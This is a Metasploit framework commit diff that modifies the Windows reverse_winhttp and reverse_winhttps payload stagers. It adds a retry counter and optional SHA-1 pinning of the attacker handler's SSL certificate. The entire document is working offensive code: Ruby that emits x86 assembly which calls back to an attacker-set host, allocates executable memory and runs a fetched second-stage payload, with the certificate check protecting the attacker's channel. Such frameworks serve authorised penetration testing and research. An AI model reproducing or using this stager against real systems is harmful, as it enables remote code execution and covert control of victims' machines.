Land rapid7#4930, @hmoore-r7 winhttp stager certificate check

Author: Brent Cook

lib/msf/core/payload/windows/reverse_winhttp.rb

@@ -36,15 +36,17 @@ def generate
         ssl:  false,
         host: datastore['LHOST'],
         port: datastore['LPORT'],
-        url:  generate_small_uri)
+        url:  generate_small_uri,
+        retry_count: datastore['StagerRetryCount'])
     end
 
     conf = {
       ssl:  false,
       host: datastore['LHOST'],
       port: datastore['LPORT'],
       url:  generate_uri,
-      exitfunk: datastore['EXITFUNC']
+      exitfunk: datastore['EXITFUNC'],
+      retry_count: datastore['StagerRetryCount']
     }
 
     generate_reverse_winhttp(conf)
@@ -98,23 +100,32 @@ def asm_generate_wchar_array(str)
       join(",")
   end
 
+
+  #
+  # Generate an assembly stub with the configured feature set and options.
   #
-  # Dynamic payload generation
+  # @option opts [Bool] :ssl Whether or not to enable SSL
+  # @option opts [String] :url The URI to request during staging
+  # @option opts [String] :host The host to connect to
+  # @option opts [Fixnum] :port The port to connect to
+  # @option opts [Bool] :verify_ssl Whether or not to do SSL certificate validation
+  # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify
+  # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
+  # @option opts [Fixnum] :retry_count The number of times to retry a failed request before giving up
   #
   def asm_reverse_winhttp(opts={})
 
+    retry_count       = [opts[:retry_count].to_i, 1].max
+    verify_ssl        = nil
+    encoded_cert_hash = nil
+    encoded_url       = asm_generate_wchar_array(opts[:url])
+    encoded_host      = asm_generate_wchar_array(opts[:host])
 
-    #
-    # options should contain:
-    #    ssl:     (true|false)
-    #    url:     "/url_to_request"
-    #   host:     [hostname]
-    #   port:     [port]
-    # exitfunk:   [process|thread|seh|sleep]
-    #
+    if opts[:ssl] && opts[:verify_cert] && opts[:verify_cert_hash]
+      verify_ssl = true
+      encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",")
+    end
 
-    encoded_url   = asm_generate_wchar_array(opts[:url])
-    encoded_host  = asm_generate_wchar_array(opts[:host])
 
     http_open_flags = 0
 
@@ -137,46 +148,52 @@ def asm_reverse_winhttp(opts={})
         push esp               ; Push a pointer to the "winhttp" string
         push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
         call ebp               ; LoadLibraryA( "winhttp" )
+      ^
 
-      set_retry:
-        push.i8  6             ; retry 6 times
-        pop edi
-        xor ebx, ebx
-        mov ecx, edi
+    if verify_ssl
+      asm << %Q^
+        load_crypt32:
+          push 0x00323374        ; Push the string 'crypt32',0
+          push 0x70797263        ; ...
+          push esp               ; Push a pointer to the "crypt32" string
+          push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+          call ebp               ; LoadLibraryA( "wincrypt" )
+        ^
+    end
+
+    asm << %Q^
 
-      push_zeros:
-        push ebx               ; NULL values for the WinHttpOpen API parameters
-        loop push_zeros
+      xor ebx, ebx
 
       WinHttpOpen:
-                               ; Flags [5]
-                               ; ProxyBypass (NULL) [4]
-                               ; ProxyName (NULL) [3]
-                               ; AccessType (DEFAULT_PROXY= 0) [2]
-                               ; UserAgent (NULL) [1]
+        push ebx               ; Flags
+        push ebx               ; ProxyBypass (NULL)
+        push ebx               ; ProxyName (NULL)
+        push ebx               ; AccessType (DEFAULT_PROXY= 0)
+        push ebx               ; UserAgent (NULL) [1]
         push 0xBB9D1F04        ; hash( "winhttp.dll", "WinHttpOpen" )
         call ebp
 
       WinHttpConnect:
-        push ebx               ; Reserved (NULL) [4]
+        push ebx               ; Reserved (NULL)
         push #{opts[:port]}    ; Port [3]
         call got_server_uri    ; Double call to get pointer for both server_uri and
-      server_uri:              ; server_host; server_uri is saved in EDI for later
+      server_uri:              ; server_host; server_uri is saved in edi for later
         db #{encoded_url}
       got_server_host:
-        push eax               ; Session handle returned by WinHttpOpen [1]
+        push eax               ; Session handle returned by WinHttpOpen
         push 0xC21E9B46        ; hash( "winhttp.dll", "WinHttpConnect" )
         call ebp
 
       WinHttpOpenRequest:
 
-        push.i32 #{"0x%.8x" % http_open_flags}
-        push ebx               ; AcceptTypes (NULL) [6]
-        push ebx               ; Referrer (NULL) [5]
-        push ebx               ; Version (NULL)  [4]
-        push edi               ; ObjectName (URI) [3]
-        push ebx               ; Verb (GET method) (NULL)  [2]
-        push eax               ; Connect handler returned by WinHttpConnect [1]
+        push #{"0x%.8x" % http_open_flags}
+        push ebx               ; AcceptTypes (NULL)
+        push ebx               ; Referrer (NULL)
+        push ebx               ; Version (NULL)
+        push edi               ; ObjectName (URI)
+        push ebx               ; Verb (GET method) (NULL)
+        push eax               ; Connect handle returned by WinHttpConnect
         push 0x5BB31098        ; hash( "winhttp.dll", "WinHttpOpenRequest" )
         call ebp
         xchg esi, eax          ; save HttpRequest handler in esi
@@ -192,16 +209,21 @@ def asm_reverse_winhttp(opts={})
             ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
             ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
           mov eax, esp
-          push.i8 4              ; sizeof(buffer)
+          push 4                 ; sizeof(buffer)
           push eax               ; &buffer
-          push.i8 31             ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS)
+          push 31                ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS)
           push esi               ; hHttpRequest
           push 0xCE9D58D3        ; hash( "winhttp.dll", "WinHttpSetOption" )
           call ebp
         ^
     end
 
     asm << %Q^
+      ; Store our retry counter in the edi register
+      set_retry:
+        push #{retry_count}
+        pop edi
+
       send_request:
 
       WinHttpSendRequest:
@@ -215,7 +237,7 @@ def asm_reverse_winhttp(opts={})
         push 0x91BB5895        ; hash( "winhttp.dll", "WinHttpSendRequest" )
         call ebp
         test eax,eax
-        jnz receive_response   ; if TRUE call WinHttpReceiveResponse API
+        jnz check_response     ; if TRUE call WinHttpReceiveResponse API
 
       try_it_again:
         dec edi
@@ -237,12 +259,79 @@ def asm_reverse_winhttp(opts={})
           ^
       end
 
+      # Jump target if the request was sent successfully
+      asm << %Q^
+        check_response:
+        ^
+
+      # Verify the SSL certificate hash
+      if verify_ssl
+
+        asm << %Q^
+          ssl_cert_get_context:
+            push 4
+            mov ecx, esp         ; Allocate &bufferLength
+            push 0
+            mov ebx, esp         ; Allocate &buffer (ebx will point to *pCert)
+
+            push ecx             ; &bufferLength
+            push ebx             ; &buffer
+            push 78              ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT)
+            push esi             ; hHttpRequest
+            push 0x272F0478      ; hash( "winhttp.dll", "WinHttpQueryOption" )
+            call ebp
+            test eax, eax        ;
+            jz failure           ; Bail out if we couldn't get the certificate context
+
+                                 ; ebx
+          ssl_cert_allocate_hash_space:
+            push 20              ;
+            mov ecx, esp         ; Store a reference to the address of 20
+            sub esp,[ecx]        ; Allocate 20 bytes for the hash output
+            mov edi, esp         ; edi will point to our buffer
+
+          ssl_cert_get_server_hash:
+            push ecx             ; &bufferLength
+            push edi             ; &buffer (20-byte SHA1 hash)
+            push 3               ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID)
+            push [ebx]           ; *pCert
+            push 0xC3A96E2D      ; hash( "crypt32.dll", "CertGetCertificateContextProperty" )
+            call ebp
+            test eax, eax        ;
+            jz failure           ; Bail out if we couldn't get the certificate context
+
+          ssl_cert_start_verify:
+            call ssl_cert_compare_hashes
+            db #{encoded_cert_hash}
+
+          ssl_cert_compare_hashes:
+            pop ebx              ; ebx points to our internal 20-byte certificate hash (overwrites *pCert)
+                                 ; edi points to the server-provided certificate hash
+
+            push 4               ; Compare 20 bytes (5 * 4) by repeating 4 more times
+            pop ecx              ;
+            mov edx, ecx         ; Keep a reference to 4 in edx
+
+          ssl_cert_verify_compare_loop:
+            mov eax, [ebx]       ; Grab the next DWORD of the hash
+            cmp eax, [edi]       ; Compare with the server hash
+            jnz failure          ; Bail out if the DWORD doesn't match
+            add ebx, edx         ; Increment internal hash pointer by 4
+            add edi, edx         ; Increment server hash pointer by 4
+            loop ssl_cert_verify_compare_loop
+
+          ; Our certificate hash was valid, hurray!
+          ssl_cert_verify_cleanup:
+            xor ebx, ebx         ; Reset ebx back to zero
+          ^
+      end
+
       asm << %Q^
         receive_response:
                                  ; The API WinHttpReceiveResponse needs to be called
-                                 ; first to get a valid handler for WinHttpReadData
-          push ebx               ; Reserved (NULL) [2]
-          push esi               ; Request handler returned by WinHttpSendRequest [1]
+                                 ; first to get a valid handle for WinHttpReadData
+          push ebx               ; Reserved (NULL)
+          push esi               ; Request handler returned by WinHttpSendRequest
           push 0x709D8805        ; hash( "winhttp.dll", "WinHttpReceiveResponse" )
           call ebp
           test eax,eax
@@ -251,7 +340,7 @@ def asm_reverse_winhttp(opts={})
 
       asm << %Q^
         allocate_memory:
-          push.i8 0x40           ; PAGE_EXECUTE_READWRITE
+          push 0x40              ; PAGE_EXECUTE_READWRITE
           push 0x1000            ; MEM_COMMIT
           push 0x00400000        ; Stage allocation (4Mb ought to do us)
           push ebx               ; NULL as we dont care where the allocation is
@@ -299,6 +388,8 @@ def asm_reverse_winhttp(opts={})
     asm
   end
 
+
+
 end
 
 end

lib/msf/core/payload/windows/reverse_winhttps.rb

@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/windows/reverse_winhttp'
+require 'rex/parser/x509_certificate'
 
 module Msf
 
@@ -17,6 +18,17 @@ module Payload::Windows::ReverseWinHttps
 
   include Msf::Payload::Windows::ReverseWinHttp
 
+  #
+  # Register reverse_winhttps specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options(
+      [
+        OptBool.new('StagerVerifySSLCert', [false, 'Whether to verify the SSL certificate hash in the handler', false])
+      ], self.class)
+  end
+
   #
   # Generate and compile the stager
   #
@@ -37,26 +49,71 @@ def generate_reverse_winhttps(opts={})
   #
   def generate
 
+    verify_cert = false
+    verify_cert_hash = nil
+
+    if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i
+      unless datastore['HandlerSSLCert']
+        raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured"
+      else
+        verify_cert = true
+        hcert = Rex::Parser::X509Certificate.parse_pem_file(datastore['HandlerSSLCert'])
+        unless hcert and hcert[0] and hcert[1]
+          raise ArgumentError, "Could not parse a private key and certificate from #{datastore['HandlerSSLCert']}"
+        end
+        verify_cert_hash = Rex::Text.sha1_raw(hcert[1].to_der)
+        print_status("Stager will verify SSL Certificate with SHA1 hash #{verify_cert_hash.unpack("H*").first}")
+      end
+    end
+
     # Generate the simple version of this stager if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space
+
+      if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i
+        raise ArgumentError, "StagerVerifySSLCert is enabled but not enough payload space is available"
+      end
+
       return generate_reverse_winhttps(
         ssl:  true,
         host: datastore['LHOST'],
         port: datastore['LPORT'],
-        url:  generate_small_uri)
+        url:  generate_small_uri,
+        verify_cert: verify_cert,
+        verify_cert_hash: verify_cert_hash,
+        retry_count: datastore['StagerRetryCount'])
     end
 
     conf = {
       ssl:  true,
       host: datastore['LHOST'],
       port: datastore['LPORT'],
       url:  generate_uri,
-      exitfunk: datastore['EXITFUNC']
+      exitfunk: datastore['EXITFUNC'],
+      verify_cert: verify_cert,
+      verify_cert_hash: verify_cert_hash,
+      retry_count: datastore['StagerRetryCount']
     }
 
     generate_reverse_winhttps(conf)
   end
 
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    space = super
+
+    # SSL support adds 20 bytes
+    space += 20
+
+    # SSL verification adds 120 bytes
+    if datastore['StagerVerifySSLCert']
+      space += 120
+    end
+
+    space
+  end
+
 end
 
 end